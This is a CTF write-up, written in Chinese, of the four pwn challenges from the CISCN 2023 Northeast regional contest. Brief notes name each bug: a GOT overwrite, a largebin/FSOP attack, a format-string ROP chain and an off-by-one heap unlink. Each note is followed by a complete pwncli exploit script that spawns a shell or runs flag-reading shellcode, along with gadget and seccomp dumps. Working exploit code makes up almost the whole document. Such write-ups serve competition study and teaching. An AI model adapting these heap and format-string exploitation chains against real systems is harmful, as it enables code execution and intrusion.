CISCN东北赛区-2023-pwn-all
CISCN东北赛区-2023-pwn-all
Novice Challenge
漏洞利用
改strlen的got表
EXP
#!/usr/bin/env python3
from pwncli import *
cli_script()
io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc
filename = gift.filename # current filename
is_debug = gift.debug # is debug or not
is_remote = gift.remote # is remote or not
gdb_pid = gift.gdb_pid # gdb pid if debug
if gift.remote:
libc = ELF("./libc.so.6")
gift[libc] = libc
sla('challenge!','root')
sla('luck!','17')
lb = recv_current_libc_addr(0x3fc10f,0x10)
libc.address = lb
leak_ex2(lb)
off = str(0xffffffff+0x10)
sla('index>>\n',off)
sa('input>>',flat(
{
0:'/bin/sh;',
0x1c:p32(0xffffff78)
}
))
sa('bye',flat(
libc.sym.system
)[:-4])
ia()
Quadra Two Times
漏洞利用
经典菜单,但是每个功能只能用两次,利用scanf函数让UB中的chunk进入Largebin即可。但是比赛的时候很蛋疼,本地打通了,远程没打通,我还以为是payload字节问题,搞了3个小时,换了4种写法...然后发现pwncli加载libc有点小问题,倒数8分钟极限出,拿到二血,但后果是导致比赛时没时间做剩下两题。。。
EXP
#!/usr/bin/env python3
'''
Author:7resp4ss
Date:2023-07-01 09:10:39
Usage:
Debug : python3 exp.py debug elf-file-path -t -b malloc
Remote: python3 exp.py remote elf-file-path ip:port
'''
from pwncli import *
cli_script()
io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc
filename = gift.filename # current filename
is_debug = gift.debug # is debug or not
is_remote = gift.remote # is remote or not
gdb_pid = gift.gdb_pid # gdb pid if debug
def cmd(i, prompt='our choice >> '):
sla(prompt, str(i))
def add(sz):
cmd('1')
sla('size',str(sz))
#......
def edit(i,cont):
cmd('3')
sla('>> ',str(i))
sa('>>',cont)
#......
def show(i):
cmd('4')
sla('>> ',str(i))
#......
def dele(i):
cmd('2')
sla('>> ',str(i))
#......
add(0x420)
add(0x418)
dele(0)
cmd('1'*0x450)
dele(1)
show(0)
lb = recv_current_libc_addr(2018184+0x448,0x100)
leak_ex2(lb)
libc.address = lb
edit(0,flat(
{
0:[
lb + 0x1ecfd0,lb + 0x1ecfd0,0,
libc.sym._IO_2_1_stderr_ + 0x68 - 0x20
]
}
))
cmd('1'*0x450)
show(0)
ru('Content: ')
leak_heap = u64_ex(r(6)+b'\x00'*2)
leak_ex2(leak_heap)
CG.set_find_area(0,1)
rop_pd = flat(
{
0x0:[
CG.mprotect_chain(leak_heap&(~0xfff)),
CG.ret(),
leak_heap + 0x1a0
]
}
)
mgg1 = libc.search(asm("mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20]")).__next__()
mgg2 = libc.search(asm("mov rsp, rdx; ret")).__next__()
mgg3 = libc.search(asm("add rsp, 0x30; mov rax, r12; pop r12; ret")).__next__()
fp = IO_FILE_plus_struct()
fsop = fp.house_of_Lys_getshell_when_exit_under_2_37(0xdeadbeef,libc.sym._IO_wfile_jumps+0x300,leak_heap)[0x10:]
data = payload_replace(fsop,{
0x38-0x10:mgg1,
0xa0-0x10:0xdeadbeef,
0x48-0x10:leak_heap + 0x100
}
)
edit(1,flat(
{
0:[
fp.house_of_Lys_stack_pivoting_when_exit_between_2_30_and_2_36(leak_heap,libc.sym._IO_wfile_jumps+0x300,rop_pd,mgg1,mgg2,mgg3)[0x10:]
],
0x190:asm(shellcraft.cat('/flag'))
}
))
cmd('5')
leak_ex2(mgg1)
ia()
'''
mov rbp, qword ptr [rdi + 0x48];
mov rax, qword ptr [rbp + 0x18];
lea r13, [rbp + 0x10];
mov dword ptr [rbp + 0x10], 0;
mov rdi, r13;
call qword ptr [rax + 0x28];'''
'''
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x04 0xc000003e if (A != ARCH_X86_64) goto 0006
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x15 0x00 0x01 0x000000e7 if (A != exit_group) goto 0005
0004: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0005: 0x25 0x00 0x01 0x00000110 if (A <= 0x110) goto 0007
0006: 0x06 0x00 0x00 0x00000000 return KILL
0007: 0x15 0x00 0x01 0x00000101 if (A != openat) goto 0009
0008: 0x06 0x00 0x00 0x00000000 return KILL
0009: 0x15 0x00 0x05 0x00000000 if (A != read) goto 0015
0010: 0x20 0x00 0x00 0x00000014 A = fd >> 32 # read(fd, buf, count)
0011: 0x15 0x00 0x04 0x00000000 if (A != 0x0) goto 0016
0012: 0x20 0x00 0x00 0x00000010 A = fd # read(fd, buf, count)
0013: 0x15 0x00 0x02 0x00000000 if (A != 0x0) goto 0016
0014: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0015: 0x15 0x00 0x01 0x0000003b if (A != execve) goto 0017
0016: 0x06 0x00 0x00 0x00000000 return KILL
0017: 0x06 0x00 0x00 0x7fff0000 return ALLOW
allow:exit_group
ban:openat
'''
repeater
漏洞利用
格式化字符串改链在栈上写rop链后,利用ret2csu的部分gadget劫持printf函数结束时的程序流到rop链
EXP
#!/usr/bin/env python3
'''
Author:7resp4ss
Date:2023-07-01 09:17:17
Usage:
Debug : python3 exp.py debug elf-file-path -t -b malloc
Remote: python3 exp.py remote elf-file-path ip:port
'''
from pwncli import *
cli_script()
io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc
filename = gift.filename # current filename
is_debug = gift.debug # is debug or not
is_remote = gift.remote # is remote or not
gdb_pid = gift.gdb_pid # gdb pid if debug
if gift.remote:
libc = ELF("./libc-2.31.so")
gift[libc] = libc
sa('length:',str(0x400))
pd = flat(
{
0:'%11$p-%13$p'
}
)
sa('the content: ',pd)
lb = int(ru('-')[:-1],16) - 0x24083
libc.address = lb
stack = int(ru('P')[:-1],16)
attack_stack = stack -0xe8
ogg = 0xe3b01 + lb
leak_ex2(lb)
leak_ex2(attack_stack)
attack_libc = lb + 0x1ec040
val_i_addr = stack - 0x30 -0xe8
leak_ex2(attack_stack)
def fmt_attack(va,attack_stack):
sa('length',str(0x400))
pd = flat(
{
0:['%' + str(attack_stack&0xffff) + 'c' + '%28$hn\x00']
}
)
sa('the content: ',pd)
sa('length:',str(0x400))
pd = flat(
{
0:['%' + str(va&0xff) + 'c' + '%41$hhn\x00']
}
)
sa('the content: ',pd)
sa('length:',str(0x400))
pd = flat(
{
0:['%' + str(val_i_addr&0xffff) + 'c' + '%28$hn\x00']
}
)
sa('the content: ',pd)
sa('length:',str(0x400))
pd = flat(
{
0:['%41$hhn\x00']
}
)
sa('the content: ',pd)
sys_addr = libc.sym.system
CG.set_find_area(0,1)
sh = CG.bin_sh()
pop_rdi = CG.pop_rdi_ret()
at_addr =attack_stack
leak_ex2(pop_rdi)
for i in range(6):
fmt_attack(pop_rdi,attack_stack)
pop_rdi = pop_rdi>>8
attack_stack = attack_stack + 1
attack_stack = at_addr + 0x8
S()
for i in range(6):
fmt_attack(sh,attack_stack)
sh = sh>>8
attack_stack = attack_stack + 1
attack_stack = at_addr + 0x10
for i in range(6):
fmt_attack(sys_addr,attack_stack)
sys_addr = sys_addr>>8
attack_stack = attack_stack + 1
attack_ret = stack - 0x38 - 0xe8
leak_ex2(attack_ret)
sa('length:',str(0x400))
pd = flat(
{
0:['%' + str(attack_ret&0xff) + 'c' + '%28$hhn\x00']
}
)
sa('the content: ',pd)
sa('length:',str(0x400))
pd = flat(
{
0:['%' + str(0xea) + 'c' + '%41$hhn\x00']
}
)
sa('the content: ',pd)
ia()
'''
.text:00000000000013E6 48 83 C4 08 add rsp, 8
.text:00000000000013EA 5B pop rbx
.text:00000000000013EB 5D pop rbp
.text:00000000000013EC 41 5C pop r12
.text:00000000000013EE 41 5D pop r13
.text:00000000000013F0 41 5E pop r14
.text:00000000000013F2 41 5F pop r15
.text:00000000000013F4 C3 retn
'''
'''
00:0000│ rsp 0x7ffec24b4808 —▸ 0x560ef5357369 ◂— jmp 0x560ef535736f
01:0008│ 0x7ffec24b4810 ◂— 0x40000000000
02:0010│ 0x7ffec24b4818 —▸ 0x560ef6a072a0 ◂— '%11$p-%13$p'
03:0018│ 0x7ffec24b4820 ◂— 0x34323031 /* '1024' */
04:0020│ 0x7ffec24b4828 ◂— 0xebcc69e4c0ca1a00
05:0028│ rbp 0x7ffec24b4830 ◂— 0x0
06:0030│ 0x7ffec24b4838 —▸ 0x7f84688f9083 (__libc_start_main+243) ◂— mov edi, eax
07:0038│ 0x7ffec24b4840 ◂— 0x100000060 /* '`' */
08:0040│ 0x7ffec24b4848 —▸ 0x7ffec24b4928 —▸ 0x7ffec24b50e8 ◂— 0x61682f656d6f682f ('/home/ha')
09:0048│ 0x7ffec24b4850 ◂— 0x168abd7a0
0a:0050│ 0x7ffec24b4858 —▸ 0x560ef535727f ◂— endbr64
0b:0058│ 0x7ffec24b4860 —▸ 0x560ef5357390 ◂— endbr64
0c:0060│ 0x7ffec24b4868 ◂— 0xb4bb42b1882ac453
0d:0068│ 0x7ffec24b4870 —▸ 0x560ef5357140 ◂— endbr64
0e:0070│ 0x7ffec24b4878 —▸ 0x7ffec24b4920 ◂— 0x1
0f:0078│ 0x7ffec24b4880 ◂— 0x0
10:0080│ 0x7ffec24b4888 ◂— 0x0
11:0088│ 0x7ffec24b4890 ◂— 0x4b46c62718aac453
12:0090│ 0x7ffec24b4898 ◂— 0x4bb393aea844c453
'''
your_note
漏洞利用
off by one改打size然后leak libc,后面都是正常操作
EXP
#!/usr/bin/env python3
'''
Author:7resp4ss
Date:2023-07-01 10:29:05
Usage:
Debug : python3 exp.py debug elf-file-path -t -b malloc
Remote: python3 exp.py remote elf-file-path ip:port
'''
from pwncli import *
cli_script()
io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc
filename = gift.filename # current filename
is_debug = gift.debug # is debug or not
is_remote = gift.remote # is remote or not
gdb_pid = gift.gdb_pid # gdb pid if debug
if gift.remote:
libc = ELF("./libc-2.23.so")
gift[libc] = libc
def cmd(i, prompt='5.go out for happy\n'):
sla(prompt, str(i))
def add(i,sz,cont='/bin/sh\x00'):
cmd('1')
sla('index?',str(i))
sla('size?',str(sz))
sla('content?',cont)
#......
def edit(i,cont):
cmd('4')
sla('hich index to edit?\n',str(i))
sla('what do you want to rewrite it ?',cont)
#......
def show(i):
cmd('3')
sla('index?',str(i))
#......
def dele(i):
cmd('2')
sla('which one?',str(i))
#......
add(0,0xf8)
add(1,0x3f8)
add(2,0xf0-0x10) #0x400 + 0xf0
add(3,0xf8)
add(4,0x3f8)
add(5,0x10)
add(6,0x10)
edit(0,flat(
{
0xf8:p8(0xf1)
}
))
dele(1)
edit(3,flat(
{
0xf0:[
0x100+0x4f0,
p8(0x20)
]
}
))
#unlink
dele(4)
add(1,0x3f8)
dele(6)
add(4,0x100,'a'*8)
add(6,0x100)
#leak a libc
show(4)
#use "^0xca"
ru('171^-^171^-^171^-^171^-^171^-^171^-^171^-^171^-^')
leak_libc = b''
for i in range(6):
data_ = int(ru('^-^')[:-3])
leak_ex2(data_)
data_ = (data_^0xca)&0xff
leak_ex2(data_)
leak_libc += p8(data_)
leak_libc = u64_ex(leak_libc)
leak_ex2(leak_libc)
lb = leak_libc - 0x3ec10a
libc.address = lb
leak_ex2(lb)
#hijack tcachebin fd
dele(6)
dele(4)
show(2)
#0x22
leak_heap = b''
for i in range(6):
data_ = int(ru('^-^')[:-3])
leak_ex2(data_)
data_ = (data_^0x22)&0xff
leak_ex2(data_)
leak_heap += p8(data_)
leak_heap = u64_ex(leak_heap)
attack_heap = leak_heap - 0x620 + 0x10
edit(2,flat(
{
0:[
libc.sym.__free_hook
]
}
))
#getshell
add(6,0x100)
add(4,0x100,p64_ex(0xfbad2887))
fp = IO_FILE_plus_struct()
CG.set_find_area(0,1)
rop_chain = flat(
{
0:[
CG.mprotect_chain(attack_heap&~(0xfff)),
CG.ret(),
attack_heap+0xc0,
]
}
)
edit(4,flat({
0x0:[
libc.sym.setcontext + 53
],
},filler = '\x00'
))
leak_ex2(leak_heap)
edit(0,flat({
0xa0:[
attack_heap + 0x20,
CG.ret(),
],
0x20:rop_chain,
0xc0:ShellcodeMall.amd64.cat_flag,
},filler = '\x00'
))
S()
dele(0)
ia()
'''
0x7f994b326085 <setcontext+53>: mov rsp,QWORD PTR [rdi+0xa0]
0x7f994b32608c <setcontext+60>: mov rbx,QWORD PTR [rdi+0x80]
0x7f994b326093 <setcontext+67>: mov rbp,QWORD PTR [rdi+0x78]
0x7f994b326097 <setcontext+71>: mov r12,QWORD PTR [rdi+0x48]
0x7f994b32609b <setcontext+75>: mov r13,QWORD PTR [rdi+0x50]
0x7f994b32609f <setcontext+79>: mov r14,QWORD PTR [rdi+0x58]
0x7f994b3260a3 <setcontext+83>: mov r15,QWORD PTR [rdi+0x60]
0x7f994b3260a7 <setcontext+87>: mov rcx,QWORD PTR [rdi+0xa8]
0x7f994b3260ae <setcontext+94>: push rcx
0x7f994b3260af <setcontext+95>: mov rsi,QWORD PTR [rdi+0x70]
pwndbg>
0x7f994b3260b3 <setcontext+99>: mov rdx,QWORD PTR [rdi+0x88]
0x7f994b3260ba <setcontext+106>: mov rcx,QWORD PTR [rdi+0x98]
0x7f994b3260c1 <setcontext+113>: mov r8,QWORD PTR [rdi+0x28]
0x7f994b3260c5 <setcontext+117>: mov r9,QWORD PTR [rdi+0x30]
0x7f994b3260c9 <setcontext+121>: mov rdi,QWORD PTR [rdi+0x68]
0x7f994b3260cd <setcontext+125>: xor eax,eax
0x7f994b3260cf <setcontext+127>: ret
'''
